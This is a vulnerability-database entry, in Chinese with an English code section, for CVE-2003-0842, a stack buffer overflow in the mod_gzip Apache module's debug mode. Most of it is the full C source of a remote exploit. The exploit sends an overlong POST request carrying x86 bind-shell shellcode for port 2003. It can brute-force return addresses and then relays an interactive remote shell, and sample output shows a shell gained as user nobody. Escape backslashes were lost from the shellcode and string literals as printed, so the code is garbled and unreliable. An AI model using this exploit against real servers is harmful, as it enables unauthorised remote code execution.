mod_gzip基于栈的缓冲区溢出漏洞


漏洞ID 1107587 漏洞类型 缓冲区溢出
发布时间 2003-11-20 更新时间 2003-11-20
CVE编号 CVE-2003-0842
CNNVD-ID CNNVD-200311-049
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/126
https://www.securityfocus.com/bid/82726
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200311-049
|漏洞详情
mod_gzip 1.3.26.1a 及更早版本(可能也包括之后的官方版本)中的 mod_gzip_printf 存在基于栈的缓冲区溢出漏洞。当以调试模式运行时,远程攻击者可通过带有 "Accept-Encoding: gzip" 头的 GET 请求中的超长文件名执行任意代码。
|漏洞EXP
/*
  	[exploit code] for mod_gzip (with debug_mode) <= 1.2.26.1a
/
  	Created by xCrZx crazy_einstein yahoo com  /05.06.03/
/
  	Tested on RedHat 8.0 (Psyche) (here is target for it), 
/               also tested on FreeBSD 4.7 (1.3.19.2a) (here is no target for it :)
/

*/

/*

/	Single mode:

/  	[crz@blacksand crz]$ ./85mod_gzip -t 0 -h localhost
 
/  	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
                   	by xCrZx [[email protected]] /05.06.03/
/ 
  	Using: ret_err = 0x42127480, ret = 0xbfffd8f0
/ 
    	[!] Connecting to localhost:80
/      	[+] Connected!
      	[*] Trying to connect to localhost:2003 port!!! Pray for success!
/      	[*] Sleeping at 2 seconds...
 
/      	[!] Shell is accessible!
 
/      	uid=99(nobody) gid=99(nobody) groups=99(nobody)
      	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/ 
	Brute mode:
/ 
	[crz@blacksand crz]$ ./85mod_gzip -h localhost -b 0xbfffffff -s 1000
/
	remote exploit for mod_gzip (debug_mode) [Linux/*BSD]
/        	         by xCrZx [[email protected]] /05.06.03/

/	Using: ret_err = 0x42127480, ret = 0xbfffffff ,step = 1000

/	[~] Brutemode activated!
	.
/	[!] Shell is accessible!

/	uid=99(nobody) gid=99(nobody) groups=99(nobody)
	Linux blacksand 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
/  

*/



#include <stdio.h>
#include <netinet/in.h>  
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>


#define STEP 1000

/*
 * Request template filled in by sprintf() in main(): first %s is the query
 * string, then the Host value, the %d Content-Length and the %s body.
 * NOTE(review): the "rn" runs look like CRLF escape sequences whose
 * backslashes were lost when the page was extracted; the literals are kept
 * exactly as the page shows them.
 */
char fmt[] =

"POST /?%s HTTP/1.1rn"
"Content-Type: text/htmlrn"
"Host: %srn"
"Content-Length: %drn"
"Accept-Encoding: gzip, deflaternrn"
"%srnrn";

	 
/*
 * Per-target parameter table, indexed by the -t option in main().  The single
 * entry is for RedHat 8.0; the per-field comments below are the author's.
 * NOTE(review): the array has no terminating entry with a NULL distr, yet
 * usage() walks it with `while(targets[i++].distr)`, so that loop reads one
 * element past the end of the array (undefined behaviour).  main() also
 * indexes targets[] with an unchecked atoi() result.
 * NOTE(review): the "x.." byte strings appear to be hex escape sequences whose
 * backslashes were lost in page extraction; they are kept as shown.
 */
struct TARGETS {
	char *distr;		/* label printed by usage() */
	long ret;		/* value placed in the request by main() */
	long std_err;		/* value placed in the request by main() */
	char *shellcode;	/* copied into the request body by main() */
	char *jmp;		/* copied into the query string by main() */
} targets[] = { 
	
	/* you can add targets here */
	
	{"RedHat 8.0 (Psyche)",  // disributive info
	 0xbfffd8f0, // return address in stack
	 0x42127480, // address of stderr
	 //shellcode for Linux x86 -> bind shell on 2003 port//
         "x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
         "x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
         "x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
         "x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
         "xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
         "x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
         "x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
         "x69x89xe3x52x53x89xe1xb0x0bxcdx80",

     	/*

     	special jump instruction (to avoid bad characters in url):
      	(jump on our shellcode into heap)
 
 	movl $0xa1a51baa,%ebx
 	addl $0x66666666,%ebx
 	jmp *%ebx

      	*/
	 
        "xbbxaax1bxa5xa1x81xc3x66x66x66x66xffxe3"

	} };

	 
/*
 * Resolve a dotted-quad string or a host name to an IPv4 address in network
 * byte order, returned in a long.  A failed name lookup prints the error and
 * terminates the process with exit(-1).
 *
 * NOTE(review): the sign test relies on inet_addr()'s INADDR_NONE (all ones)
 * becoming negative once stored in a long.  That holds only where long is
 * 32 bits; on an LP64 host the value stays positive and a non-numeric name
 * is returned as-is instead of going through gethostbyname().
 */
long getip(char *hostname) {
	long addr = inet_addr(hostname);

	/* Numeric form accepted (or INADDR_NONE read as non-negative): done. */
	if (addr >= 0) {
		return addr;
	}

	struct hostent *entry = gethostbyname(hostname);
	if (entry == NULL) {
		perror("gethostbyname()");
		exit(-1);
	}
	/* h_length bytes of the first address are copied into the long. */
	memcpy(&addr, entry->h_addr, entry->h_length);
	return addr;
}

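/*
 * Print the command-line synopsis and the list of entries in targets[], then
 * terminate with exit(0).
 *
 * The target loop is bounded by the array's element count rather than by a
 * sentinel: targets[] has no terminating entry with a NULL distr, so the
 * original `while(targets[i++].distr)` read one element past its end.
 *
 * NOTE(review): the "n"/"t" sequences in the literals look like escape
 * sequences whose backslashes were lost in page extraction; they are kept as
 * the page shows them.  The synopsis literal, which the page shows broken
 * across two lines, is written as two adjacent literals here.
 */
void usage(char *prog) {
	size_t ntargets = sizeof targets / sizeof targets[0];

	printf("nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] "
	       "[-b addr] [-s step_num]nnTargets:n", prog);
	for (size_t i = 0; i < ntargets; i++) {
		printf("t[%d] -> %sn", (int)i, targets[i].distr);
	}
	printf("n");
	exit(0);
}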

/*
 * Entry point.  Scans argv for the options listed in usage(), fills one HTTP
 * request from fmt and targets[trg], sends it to port on victim, sleeps two
 * seconds, then tries to connect to shellport and relays that socket to
 * stdin/stdout.  The whole sequence is a do/while that repeats only while
 * brutemode is set, lowering ret by step on each pass.
 *
 * NOTE(review): the "n"/"t" sequences in the string literals look like escape
 * sequences whose backslashes were lost in page extraction; they are kept as
 * shown.  Return values of socket(), write() and select() are never checked.
 */
int main(int argc, char **argv) {
 
    	int i=0;     
    	struct sockaddr_in sockstruct;	/* NOTE(review): not zeroed before the first connect(); sin_zero is cleared only before the second */
    	struct hostent *HOST;	/* unused */
    	char tmp[20000];	/* formatted request; later the relay buffer */
	char buf1[5000],buf2[10000];	/* query-string and body fragments */
    	int sock;
    	fd_set  rset;
	int port=80,shellport=2003;	/* port the request goes to; port the second connect() tries */
	int step=STEP;	/* subtracted from ret after every pass */
	char *victim=NULL;
	long ret=0xbfffffff,ret_err;
	int brutemode=0;
	char *shellcode,*jmp;
	int trg=0;	/* index into targets[]; never range-checked */

printf("nremote exploit for mod_gzip (debug_mode) [Linux/*BSD]ntt by xCrZx [crazy_einstein] /05.06.03/n");

	/*
	 * Option scan: only the second character of each argv entry is tested,
	 * for every entry including argv[0] and option values.
	 * NOTE(review): nothing checks that argv[i] starts with '-', that it
	 * has a second character, or that argv[i+1] exists.
	 */
	for(i=0;i<argc;i++) {
		if(argv[i][1]=='h') victim=argv[i+1];
		if(argv[i][1]=='p') port=atoi(argv[i+1]);
		if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
               	if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);	/* NOTE(review): %x stores into a long */
		if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
		if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
	}

	/* A host is mandatory; ret can only be 0 through -t/-r/-b. */
	if(!victim || ret==0) usage(argv[0]);

	/* Per-target values, see targets[] above. */
	ret_err=targets[trg].std_err;
	shellcode=targets[trg].shellcode;
	jmp=targets[trg].jmp;

	/* NOTE(review): long arguments printed with %x. */
	printf("nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
	if(brutemode) printf(" ,step = %dn",step);
	
	printf("n");
	
	if(brutemode)printf("[~] Brutemode activated!n");

	/* One attempt per iteration; the loop condition is brutemode (see the end). */
	do {
    	
    	sock=socket(PF_INET,SOCK_STREAM,0);
    	sockstruct.sin_family=PF_INET; 
    	sockstruct.sin_addr.s_addr=getip(victim);
    	sockstruct.sin_port=htons(port);

    	if(!brutemode)printf("n[!] Connecting to %s:%dn",victim,port);
   
      	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {

        	if(!brutemode)printf("[+] Connected!n",i);	/* the extra argument i is ignored */

		memset(tmp ,0x00,sizeof tmp );
               	memset(buf1,0x00,sizeof buf1);
	       	memset(buf2,0x00,sizeof buf2);

		/*
		 * Fill buf1 and buf2 with fixed-length pieces; each append is
		 * positioned with strlen() of the partially filled buffer.
		 * NOTE(review): the `*(long *)&buf1[...]` stores are unaligned
		 * type-punned writes, and the total length is not compared
		 * against sizeof buf1.
		 */
		memset(buf1,0x90,2016);
		memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
		memset(buf1+strlen(buf1),0x90,2280);
		*(long *)&buf1[strlen(buf1)]=ret_err;
		for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;

		memset(buf2,0x90,1000);
		memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
		
		/* Unbounded sprintf() into tmp (20000 bytes); write() result unchecked. */
		sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
		write(sock,tmp,strlen(tmp));

      	}else { printf("[x] Error: Could not connect to %s:%d!n",victim,port);exit(0);}
    
      	close(sock);

	/* Next candidate value for the brute loop. */
	ret-= step;

	if(brutemode) {printf(".");fflush(stdout);}
	

	if(!brutemode) {	
		printf("[*] Trying to connect to %s:%d port!!! Pray for success!n",victim,shellport);
		printf("[*] Sleeping at 2 seconds...n");
	}
	
	sleep(2);
	
	/* Second connection, to shellport; sin_zero is cleared only here. */
       	sock=socket(PF_INET,SOCK_STREAM,0);

	bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
	sockstruct.sin_family=PF_INET; 
       	sockstruct.sin_addr.s_addr=getip(victim);
       	sockstruct.sin_port=htons(shellport);

       	if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
	        printf("n[!] Shell is accessible!nn");
	        write(sock, "id;uname -an", 12); 
	        /*
	         * Relay loop: select() on the socket and stdin, copy socket
	         * data to stdout and stdin data to the socket.  It ends only
	         * through exit(0) when read() on the socket returns <= 0.
	         */
	        while (1) {
	                FD_ZERO(&rset);
	                FD_SET(sock,&rset);
	                FD_SET(STDIN_FILENO,&rset);
	                select(sock + 1, &rset, NULL, NULL, NULL);

       			if (FD_ISSET(sock, &rset)) {
	                        i = read(sock, tmp, sizeof(tmp) - 1);
	                        if (i <= 0) {
	                                printf("[!] Connection closed.n");
	                                close(sock);
	                                exit(0);
	                        }
                        tmp[i] = 0;
                        printf("%s", tmp);	/* NOTE(review): peer data is written to the terminal unfiltered */
	                }
        	        if (FD_ISSET(STDIN_FILENO, &rset)) {
                	        i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
                        	if (i > 0) {
                                	tmp[i]=0;
	                                write(sock, tmp, i);
        	                }
                	}
	        }
       	} else if(!brutemode)printf("[x] Shell is inaccessible..nn");

       	close(sock);

	} while ( brutemode );

      
    	return 0;
}

// milw0rm.com [2003-11-20]
|受影响的产品
Dag Apt Repository Mod Gzip 1.3.26.1A
|参考资料

来源:BUGTRAQ
名称:20030601Mod_gzipDebugModeVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105457180009860&w=2
来源:BUGTRAQ
名称:20030601Mod_gzipDebugModeVulnerabilities
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105457180009860&w=2
